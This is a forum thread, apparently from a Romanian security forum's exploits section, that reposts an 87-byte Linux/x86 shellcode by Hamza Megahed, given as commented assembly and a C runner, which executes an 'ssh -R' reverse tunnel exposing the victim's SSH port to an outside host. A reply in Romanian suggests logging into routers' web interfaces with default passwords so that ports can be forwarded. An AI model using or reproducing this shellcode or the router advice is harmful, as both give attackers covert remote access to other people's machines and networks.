Jump to content
Matt

Linux/x86 Remote Port Forwarding Shellcode 87 bytes

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Author : Hamza Megahed

Source : Linux/x86 Remote Port Forwarding Shellcode 87 bytes

Vulnerable App : N/A

Code : 

*****************************************************
* Linux/x86 Remote Port forwarding 87 bytes         *
* ssh -R 9999:localhost:22 192.168.0.226            *
*****************************************************
* Author: Hamza Megahed                             *
*****************************************************
* Twitter: @Hamza_Mega                              *
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com             *
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        *
*****************************************************

xor    %eax,%eax
push   %eax
pushl  $0x3632322e
pushl  $0x30302e38
pushl  $0x36312e32
pushw  $0x3931
movl   %esp,%esi
push   %eax
push   $0x32323a74
push   $0x736f686c
push   $0x61636f6c
push   $0x3a393939
pushw  $0x3930
movl   %esp,%ebp
push   %eax
pushw  $0x522d
movl   %esp,%edi
push   %eax
push   $0x6873732f
push   $0x6e69622f
push   $0x7273752f
movl   %esp,%ebx
push   %eax
push   %esi
push   %ebp
push   %edi
push   %ebx
movl   %esp,%ecx
mov    $0xb,%al
int    $0x80

********************************
#include <stdio.h>
#include <string.h>

char *shellcode = 
"\x31\xc0\x50\x68\x2e\x32\x32\x36\x68\x38\x2e\x30\x30\x68\x32\x2e\x31\x36"
"\x66\x68\x31\x39\x89\xe6\x50\x68\x74\x3a\x32\x32\x68\x6c\x68\x6f\x73\x68"
"\x6c\x6f\x63\x61\x68\x39\x39\x39\x3a\x66\x68\x30\x39\x89\xe5\x50\x66\x68"
"\x2d\x52\x89\xe7\x50\x68\x2f\x73\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75"
"\x73\x72\x89\xe3\x50\x56\x55\x57\x53\x89\xe1\xb0\x0b\xcd\x80";




int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

yo20063 Newbie

yo20063

Posted
Posted (edited)

Totul e super ok, dar majoritatea folosesc routere, si degeaba faci forward din pc sau server daca nu ai access la routerul lui sa faci forward. Cu un anumit access pe server cam toata lumea de pe aici stie sa isi porneasca un server SSH remote. Problema ramane insa routerul :)

//edit

daca esti remote intr-un server bla bla bla si foloseste router care nu are acces ssh sau telnet din reteaua interioara, recomand a se folosi asta pentru a accesa interfata web a routerului, majoritatea folosesc parolele de acces default, se face forward din router si apoi voila! Faceti ce vreti :P

Probabil multi stiu, am scris si eu ca poate mai sunt unii care raman fara idei :P

Bafta!

Edited by yo20063

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...